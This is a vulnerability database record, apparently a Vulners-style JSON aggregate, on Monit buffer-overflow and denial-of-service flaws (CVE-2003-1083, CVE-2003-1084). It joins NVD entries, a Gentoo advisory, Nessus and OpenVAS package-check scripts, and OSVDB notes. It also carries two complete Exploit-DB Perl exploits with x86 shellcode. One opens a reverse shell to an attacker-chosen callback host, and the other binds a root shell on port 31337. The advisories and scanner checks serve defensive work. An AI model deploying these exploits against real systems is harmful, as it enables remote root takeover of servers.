\"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/monit\", unaffected:make_list(\"ge 4.2\"), vulnerable:make_list(\"le 4.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"app-admin/monit\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "14465", "cpe": ["p-cpe:/a:gentoo:linux:monit", "cpe:/o:gentoo:linux"]}
{"cve": [{"lastseen": "2017-07-11T11:14:19", "references": ["http://security.gentoo.org/glsa/glsa-200403-14.xml", "http://www.kb.cert.org/vuls/id/206382", "http://www.securityfocus.com/bid/9098", "http://www.tildeslash.com/monit/dist/CHANGES.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/13818", "http://www.securityfocus.com/archive/1/345417"], "description": "Monit 1.4 to 4.1 allows remote attackers to cause a denial of service (daemon crash) via an HTTP POST request with a negative Content-Length field.", "edition": 2, "reporter": "NVD", "published": "2003-11-24T00:00:00", "title": "CVE-2003-1084", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:19", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-1084"], "scanner": [], "modified": "2017-07-10T21:29:43", "cpe": ["cpe:/a:tildeslash:monit:4.0", "cpe:/a:tildeslash:monit:2.3", "cpe:/a:tildeslash:monit:1.4.1", "cpe:/a:tildeslash:monit:3.1", "cpe:/a:tildeslash:monit:1.4", "cpe:/a:tildeslash:monit:2.2.1", "cpe:/a:tildeslash:monit:3.2", "cpe:/a:tildeslash:monit:2.4.3", "cpe:/a:tildeslash:monit:2.1.1", "cpe:/a:tildeslash:monit:3.0", "cpe:/a:tildeslash:monit:4.1", "cpe:/a:tildeslash:monit:2.4.1", "cpe:/a:tildeslash:monit:2.4.2", "cpe:/a:tildeslash:monit:2.4", "cpe:/a:tildeslash:monit:2.0", "cpe:/a:tildeslash:monit:2.2", "cpe:/a:tildeslash:monit:2.1"], "id": "CVE-2003-1084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1084", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-11T11:14:19", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/13817", "http://security.gentoo.org/glsa/glsa-200403-14.xml", "http://www.securityfocus.com/bid/9099", "http://www.kb.cert.org/vuls/id/623854", "http://www.tildeslash.com/monit/dist/CHANGES.txt", "http://www.securityfocus.com/archive/1/345417"], "description": "Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.", "edition": 2, "reporter": "NVD", "published": "2003-12-31T00:00:00", "title": "CVE-2003-1083", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:19", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-1083"], "scanner": [], "modified": "2017-07-10T21:29:43", "cpe": ["cpe:/a:tildeslash:monit:4.0", "cpe:/a:tildeslash:monit:2.3", "cpe:/a:tildeslash:monit:1.4.1", "cpe:/a:tildeslash:monit:3.1", "cpe:/a:tildeslash:monit:1.4", "cpe:/a:tildeslash:monit:2.2.1", "cpe:/a:tildeslash:monit:3.2", "cpe:/a:tildeslash:monit:2.4.3", "cpe:/a:tildeslash:monit:2.1.1", "cpe:/a:tildeslash:monit:3.0", "cpe:/a:tildeslash:monit:4.1", "cpe:/a:tildeslash:monit:2.4.1", "cpe:/a:tildeslash:monit:2.4.2", "cpe:/a:tildeslash:monit:2.4", "cpe:/a:tildeslash:monit:2.0", "cpe:/a:tildeslash:monit:2.2", "cpe:/a:tildeslash:monit:2.1"], "id": "CVE-2003-1083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1083", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:37", "references": ["http://www.securityfocus.com/bid/9099", "http://www.securityfocus.com/bid/9098", "https://bugs.gentoo.org/show_bug.cgi?id=43967", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1084", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1083"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "4.1", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "app-admin/monit", "operator": "le"}], "edition": 1, "description": "### Background\n\nMonit is a system administration utility that allows management and monitoring of processes, files, directories and devices on a Unix system. \n\n### Description\n\nA denial of service may occur due to Monit not sanitizing remotely supplied HTTP parameters before passing them to memory allocation functions. This could allow an attacker to cause an unexpected condition that could lead to the Monit daemon crashing. \n\nAn overly long http request method may cause a buffer overflow due to Monit performing insufficient bounds checking when handling HTTP requests. \n\n### Impact\n\nAn attacker may crash the Monit daemon to create a denial of service condition or cause a buffer overflow that would allow arbitrary code to be executed with root privileges. \n\n### Workaround\n\nA workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package. \n\n### Resolution\n\nMonit users should upgrade to version 4.2 or later: \n \n \n \n # emerge sync\n \n # emerge -pv \">=app-admin/monit-4.2\"\n # emerge \">=app-admin/monit-4.2\"", "reporter": "Gentoo Foundation", "published": "2004-03-31T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "gentoo", "title": "Multiple Security Vulnerabilities in Monit", "bulletinFamily": "unix", "cvelist": ["CVE-2003-1083", "CVE-2003-1084"], "modified": "2006-05-22T00:00:00", "id": "GLSA-200403-14", "href": "https://security.gentoo.org/glsa/200403-14", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:57", "references": [], "pluginID": "54539", "description": "The remote host is missing updates announced in\nadvisory GLSA 200403-14.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200403-14 (app-admin/monit)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-1083", "CVE-2003-1084"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54539", "id": "OPENVAS:54539", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A denial of service and a buffer overflow vulnerability have been found in\nMonit.\";\ntag_solution = \"Monit users should upgrade to version 4.2 or later:\n\n # emerge sync\n\n # emerge -pv '>=app-admin/monit-4.2'\n # emerge '>=app-admin/monit-4.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200403-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=43967\nhttp://www.securityfocus.com/bid/9098\nhttp://www.securityfocus.com/bid/9099\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200403-14.\";\n\n \n\nif(description)\n{\n script_id(54539);\n script_cve_id(\"CVE-2003-1083\",\"CVE-2003-1084\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200403-14 (app-admin/monit)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-admin/monit\", unaffected: make_list(\"ge 4.2\"), vulnerable: make_list(\"le 4.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "references": [], "edition": 1, "description": "## Vulnerability Description\nMonit HTTP Server contains a flaw that may allow a remote denial of service. The issue is triggered when the server recieves a HTTP request with a negative value in the \"Content-Length:\" header, and will result in loss of availability for the service.\n## Solution Description\nUpgrade to version 4.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMonit HTTP Server contains a flaw that may allow a remote denial of service. The issue is triggered when the server recieves a HTTP request with a negative value in the \"Content-Length:\" header, and will result in loss of availability for the service.\n## References:\nVendor URL: http://www.tildeslash.com/monit/\nVendor Specific Solution URL: http://www.tildeslash.com/monit/dist/\n[Vendor Specific Advisory URL](http://www.tildeslash.com/monit/dist/CHANGES.txt)\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/advisories/gentoo_advisory-4182.html)\n[Secunia Advisory ID:10280](https://secuniaresearch.flexerasoftware.com/advisories/10280/)\nMail List Post: http://lists.netsys.com/pipermail/full-disclosure/2003-November/014093.html\nKeyword: S-Quadra Advisory #2003-11-24\nISS X-Force ID: 13818\nGeneric Informational URL: http://www.s-quadra.com/advisories/Adv-20031124.txt\n[CVE-2003-1084](https://vulners.com/cve/CVE-2003-1084)\nCERT VU: 623854\nBugtraq ID: 9098\n", "reporter": "Evgeny Legerov()", "published": "2003-11-24T08:36:46", "title": "Monit Content-Length HTTP Request DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "HTTP Server", "version": "4.1", "operator": "eq"}], "cvelist": ["CVE-2003-1084"], "modified": "2003-11-24T08:36:46", "href": "https://vulners.com/osvdb/OSVDB:2865", "id": "OSVDB:2865", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:57", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Monit HTTP Server. The HTTP Server fails to verify the length of an incoming request resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nUpgrade to version 4.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Monit HTTP Server. The HTTP Server fails to verify the length of an incoming request resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.\n## References:\nVendor Specific Solution URL: http://www.tildeslash.com/monit/dist/\n[Vendor Specific Advisory URL](http://www.tildeslash.com/monit/dist/CHANGES.txt)\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/advisories/gentoo_advisory-4182.html)\n[Secunia Advisory ID:10280](https://secuniaresearch.flexerasoftware.com/advisories/10280/)\n[Related OSVDB ID: 2865](https://vulners.com/osvdb/OSVDB:2865)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0387.html\nISS X-Force ID: 13817\nGeneric Informational URL: http://www.s-quadra.com/advisories/Adv-20031124.txt\n[CVE-2003-1083](https://vulners.com/cve/CVE-2003-1083)\nCERT VU: 206382\nBugtraq ID: 9099\n", "reporter": "OSVDB", "published": "2003-11-24T08:36:46", "title": "Monit HTTP Request Handling Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "HTTP Server", "version": "4.1", "operator": "eq"}], "cvelist": ["CVE-2003-1083"], "modified": "2003-11-24T08:36:46", "href": "https://vulners.com/osvdb/OSVDB:2858", "id": "OSVDB:2858", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T20:54:53", "osvdbidlist": ["2858"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Monit 1.4/2.x/3/4 Overly Long HTTP Request Buffer Overrun Vulnerability. CVE-2003-1083. Remote exploit for linux platform", "reporter": "Shadowinteger", "published": "2003-11-24T00:00:00", "type": "exploitdb", "title": "Monit 1.4/2.x/3/4 Overly Long HTTP Request Buffer Overrun Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1083"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2003-11-24T00:00:00", "id": "EDB-ID:23397", "href": "https://www.exploit-db.com/exploits/23397/", "sourceData": "source: http://www.securityfocus.com/bid/9099/info\r\n\r\nA buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem occurs due to insufficient bounds checking when handling overly long HTTP requests. As a result, it may be possible for a remote attacker to corrupt sensitive process data in such a way that the execution flow of Monit can be controlled.\r\n\r\nSuccessful exploitation of this condition could potentially allow for the execution of arbitrary code with root privileges. \r\n\r\n// Michel, http://www.cycom.se\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)\r\n# (C) 2004 by Shadowinteger <shadowinteger@sentinix.org>\r\n#\r\n# Verbatim copying, distribution and/or modification of this\r\n# code is permitted without restriction.\r\n#\r\n# THIS SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY\r\n# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\r\n# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\r\n# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\r\n# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR\r\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\r\n# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\r\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n#\r\n# You may have to install Math::XOR for this to run, e.g.:\r\n# $ perl -MCPAN -e \"install Math::XOR\"\r\n#\r\n# Acknowledgments: Sabu, Nullbyte\r\n#\r\n\r\nuse POSIX;\r\nuse Getopt::Std;\r\nuse IO::Socket::INET;\r\nuse Math::XOR;\r\nuse strict;\r\n\r\nsub usage {\r\n print \"usage: sploit [-a 0xbf7ff9e4] [-o 250] target_host [port]\\n\" .\r\n \" -a address ret address to make eip\\n\" .\r\n \" -o offset offset to subtract from address before injecting it\\n\" .\r\n \" -c hostname choose hostname to have the shellcode connect back to, default\\n\" .\r\n \" is localhost\\n\" .\r\n \" -p port choose port to have the shellcode connect back to, default is\\n\" .\r\n \" 31337.\\n\" .\r\n \" -B use x86 *BSD shellcode instead of x86 Linux\\n\" .\r\n \"The default address is 0xbf7ff9e4 and the default offset to subtract from that\\n\" .\r\n \"address is 250, this works under Slackware 8.1 with default ./configure\\n\" .\r\n \"compilation options. You may have to do some research for your system, gdb is\\n\" .\r\n \"your friend, e.g. \\\"gdb process pid_of_monit_httpd\\\".\\n\";\r\n exit 1;\r\n}\r\n\r\n# pre_shellcode was added to make sure the stack doesn't write into our\r\n# shellcode\r\nmy $pre_shellcode = \"\\x83\\xC4\\x40\"; # add esp, byte 0x40\r\n\r\nmy $linux_shellcode = # shadowinteger's reverse shellcode (sishell, x86 linux)\r\n\"\\xeb\\x74\\x5d\\x6a\\x06\\x6a\\x01\\x6a\\x02\\x8d\\x1c\\x24\\x89\\xd9\\x31\\xdb\" .\r\n\"\\xb3\\x01\\x31\\xc0\\xb0\\x66\\xcd\\x80\\x89\\xc7\\x83\\xec\\x08\\x31\\xc9\\xc6\" .\r\n\"\\x04\\x24\\x02\\x88\\x4c\\x24\\x01\\xb8\\x80\\xff\\xff\\xfe\\x35\\xff\\xff\\xff\" .\r\n\"\\xff\\x66\\xc7\\x44\\x24\\x02\\x7a\\x69\\x89\\x44\\x24\\x04\\x8d\\x04\\x24\\x83\" .\r\n\"\\xec\\x10\\x89\\x3c\\x24\\x89\\x44\\x24\\x04\\x31\\xc0\\xb0\\x10\\x89\\x44\\x24\" .\r\n\"\\x08\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x03\\x8d\\x14\\x24\\x89\\xd1\\xcd\\x80\" .\r\n\"\\x85\\xc0\\x78\\x3c\\x31\\xc9\\x31\\xc0\\xb0\\x3f\\x89\\xfb\\xcd\\x80\\x41\\x80\" .\r\n\"\\xf9\\x02\\x77\\x04\\xeb\\xf0\\xeb\\x2f\\x83\\xec\\x10\\x8d\\x44\\x24\\x08\\x89\" .\r\n\"\\x04\\x24\\x31\\xdb\\x89\\x5c\\x24\\x04\\x89\\x5c\\x24\\x08\\x88\\x5d\\x07\\x89\" .\r\n\"\\xeb\\x8d\\x14\\x24\\x89\\xd1\\x31\\xd2\\x31\\xc0\\xb0\\x0e\\x2c\\x03\\xcd\\x80\" .\r\n\"\\x31\\xc0\\x89\\xc3\\x40\\xcd\\x80\\xe8\\x56\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\" .\r\n\"\\x2f\\x73\\x68\\x24\";\r\nmy $lin_IP_OFFSET = 40;\r\nmy $lin_PORT_OFFSET = 54;\r\nmy $lin_XOR = 0xffffffff; # number to xor the ip address with\r\n\r\n\r\nmy $bsd_shellcode = # shadowinteger's reverse shellcode (sishell, x86 bsd)\r\n\"\\xeb\\x55\\x5d\\x6a\\x06\\x6a\\x01\\x6a\\x02\\x31\\xc0\\xb0\\x61\\x50\\xcd\\x80\" .\r\n\"\\x89\\xc7\\x83\\xec\\x08\\x31\\xc9\\xc6\\x04\\x24\\x02\\x88\\x4c\\x24\\x01\\xb8\" .\r\n\"\\x80\\xff\\xff\\xfe\\x35\\xff\\xff\\xff\\xff\\x66\\xc7\\x44\\x24\\x02\\x7a\\x69\" .\r\n\"\\x89\\x44\\x24\\x04\\x8d\\x04\\x24\\x6a\\x10\\x50\\x57\\x31\\xc0\\xb0\\x62\\x50\" .\r\n\"\\xcd\\x80\\x72\\x3b\\x31\\xc9\\x51\\x57\\x31\\xc0\\xb0\\x5a\\x50\\xcd\\x80\\x41\" .\r\n\"\\x80\\xf9\\x02\\x77\\x04\\xeb\\xef\\xeb\\x2e\\x83\\xec\\x10\\x8d\\x44\\x24\\x08\" .\r\n\"\\x89\\x04\\x24\\x31\\xdb\\x89\\x5c\\x24\\x04\\x89\\x5c\\x24\\x08\\x8d\\x14\\x24\" .\r\n\"\\x89\\xd1\\x53\\x51\\x88\\x5d\\x07\\x55\\x31\\xc0\\xb0\\x3b\\x50\\xcd\\x80\\x31\" .\r\n\"\\xc0\\x50\\xfe\\xc0\\x50\\xcd\\x80\\xe8\\x76\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\" .\r\n\"\\x2f\\x73\\x68\\x24\";\r\nmy $bsd_IP_OFFSET = 32;\r\nmy $bsd_PORT_OFFSET = 46;\r\nmy $bsd_XOR = 0xffffffff;\r\n\r\n\r\n# just define these here, since we're \"strict\"\r\nmy $shellcode;\r\nmy $IP_OFFSET;\r\nmy $PORT_OFFSET;\r\nmy $XOR;\r\n\r\n\r\n# set up defaults\r\n\r\nmy $offset = 250; # offset to back-track (subtract) from $address\r\nmy $address = 0xbf7ff9e4;\r\n\r\nmy $target = \"localhost\";\r\nmy $port = 2812;\r\n\r\nmy $callback_host = \"localhost\";\r\nmy $callback_port = pack('n', 31337);\r\n\r\n\r\n# handle options\r\n\r\nmy %options = ();\r\ngetopts(\"a:o:c:p:Bh\", \\%options);\r\n\r\nif ( defined $options{h} ) {\r\n usage();\r\n}\r\nif ( ! $ARGV[0]) {\r\n usage();\r\n} else {\r\n if ( length($ARGV[0]) > 0 ) {\r\n $target = $ARGV[0];\r\n }\r\n}\r\nif ( $ARGV[1]) {\r\n $port = $ARGV[1];\r\n}\r\n\r\n# if -B option is present, define $bsd\r\nmy $bsd = \"yes\" if defined $options{B};\r\n\r\nif ( defined $options{a} ) {\r\n $address = hex($options{a});\r\n}\r\nif ( defined $options{o} ) {\r\n $offset = $options{o};\r\n}\r\nif ( defined $options{c} ) {\r\n if ( length($options{c}) > 0 ) {\r\n $callback_host = $options{c};\r\n }\r\n}\r\nif ( defined $options{p} ) {\r\n $callback_port = pack('n', $options{p});\r\n}\r\n\r\n\r\n# set up shellcode pointers... linux or bsd?\r\n\r\nif ( defined $bsd ) {\r\n $shellcode = $bsd_shellcode;\r\n $IP_OFFSET = $bsd_IP_OFFSET;\r\n $PORT_OFFSET = $bsd_PORT_OFFSET;\r\n $XOR = $bsd_XOR;\r\n} else {\r\n $shellcode = $linux_shellcode;\r\n $IP_OFFSET = $lin_IP_OFFSET;\r\n $PORT_OFFSET = $lin_PORT_OFFSET;\r\n $XOR = $lin_XOR;\r\n}\r\n\r\n\r\n# resolve hostname\r\nmy $callback_ip = gethostbyname($callback_host);\r\n\r\n# insert resolved connect back address into shellcode\r\nsubstr($shellcode, $IP_OFFSET, 4, xor_buf($callback_ip, pack('l',$XOR)));\r\n\r\n# insert port into shellcode (short network order)\r\nsubstr($shellcode, $PORT_OFFSET, 2, $callback_port);\r\n\r\n# decode (un-xor) IP address in shellcode and print it to stdout\r\n# don't uncomment, it's just an example\r\n# print xor_buf(substr($shellcode, $IP_OFFSET, 4), pack('l',$XOR));\r\n\r\n\r\n# calculate address and make it binary\r\n\r\nmy $eip = $address - $offset;\r\nmy $bin_eip = pack('l', $eip);\r\n\r\n# cruft is our parsed payload:\r\n# [ NOPNOPNOPNOP ] [ PRE ] [ SHELLCODE ] [ ADDR ] [ ADDR ]\r\n# ^\r\n# ideal jump address\r\n#\r\nmy $cruft = \"\\x90\" x (256 - length($pre_shellcode . $shellcode)) .\r\n $pre_shellcode . $shellcode . $bin_eip x 2;\r\n\r\n# build HTTP request, there's nothing more to it than to add a double linefeed\r\nmy $request = $cruft . \"\\n\\n\";\r\n\r\n#\r\n# print banner and get started\r\n#\r\nprint '-?? Monit 4.1 remote shell exploit (HTTP)'.\"\\n\";\r\nprint '??- (C) 2004 Shadowinteger <shadowinteger@sentinix.org'.\"\\n\";\r\n\r\nif ( defined $bsd ) {\r\n print \"[i] using x86 *BSD shellcode (sishell)\\n\";\r\n} else {\r\n print \"[i] using x86 Linux shellcode (sishell)\\n\";\r\n}\r\n\r\nprintf(\"[i] using ret address: 0x%x\\n\", $eip);\r\n\r\nprint \"[i] shellcode will connect to \" . inet_ntoa($callback_ip) .\r\n \", port \" . unpack('n', $callback_port) . \"\\n\";\r\n\r\nprint \"[i] attacking \" . $target . \", port \" . $port . \"\\n\";\r\nprint \"[+] connecting to target...\\n\";\r\n\r\nmy $socket = 0;\r\n$socket = IO::Socket::INET -> new( PeerAddr => $target,\r\n PeerPort => $port,\r\n Proto => \"tcp\" );\r\nif (!defined($socket)) {\r\n print \"[?] no connection!\\n\";\r\n exit 1;\r\n}\r\n\r\nprint \"[i] connection established\\n\";\r\n\r\nprint \"[+] injecting shellcode...\\n\";\r\nprint $socket $request;\r\nsleep(3);\r\nprint \"[i] done\\n\";\r\nclose $socket;\r\nexit 0;\r\n## EOF\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23397/"}, {"lastseen": "2016-01-31T11:51:53", "osvdbidlist": ["2858"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Monit <= 4.1 Remote Root Buffer Overflow Exploit. CVE-2003-1083. Remote exploit for linux platform", "reporter": "gsicht", "published": "2004-04-09T00:00:00", "type": "exploitdb", "title": "Monit <= 4.1 - Remote Root Buffer Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1083"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2004-04-09T00:00:00", "id": "EDB-ID:173", "href": "https://www.exploit-db.com/exploits/173/", "sourceData": "#!/usr/bin/perl\r\n#\r\n# monit <= 4.1 remote root exploit\r\n# coded by gsicht (09.04.04)\r\n#\r\n\r\nuse IO::Socket::INET;\r\n$socket = 0;\r\n\r\nmy $shellcode = # 8 + 88 = 96 bytes portbind 31337\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\r\n\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\" .\r\n\"\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\" .\r\n\"\\x89\\xc7\\x52\\x66\\x68\" .\r\n\"\\x7a\\x69\" . # port 31337/tcp, change if needed\r\n\"\\x43\\x66\\x53\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\" .\r\n\"\\xb0\\x66\\xb3\\x04\\xcd\\x80\" .\r\n\"\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\" .\r\n\"\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49\\xcd\\x80\" .\r\n\"\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n\r\n\r\nprint \"\\nmonit 4.1 dos exploit\\n\";\r\nprint \"coded by gsicht\\n\\n\";\r\n\r\nif(@ARGV<1)\r\n{\r\nprint \"Usage: perl agate.pl <target>\\n\\n\";\r\nexit(0);\r\n}\r\n\r\nprint \"HOST:\\t$ARGV[0]\\n\";\r\nprint \"PORT:\\t2812\\n\";\r\n\r\n\r\nmy $buffer = \"B\" x 284 . \"\\xcf\\x89\\xb3\\x40\" . $shellcode; # esp mandrake 9.1\r\n#my $buffer = \"A\" x 284 . \"XXXX\" . \"B\" x 100; #dos and debug\r\n\r\nprint \"connecting to server...\\n\";\r\n\r\n$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],\r\n PeerPort => 2812,\r\n Proto => \"tcp\");\r\nif(!defined($socket))\r\n{\r\nprint \"could not connect :-P\\n\";\r\nsleep(1);\r\nexit(0);\r\n}\r\n\r\nprint \"connected\\n\";\r\nsleep(1);\r\nprint \"sending string\\n\";\r\nprint $socket $buffer;\r\n\r\nclose $socket;\r\nprint \"\\ndosed!\\n\";\n\n# milw0rm.com [2004-04-09]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/173/"}]}
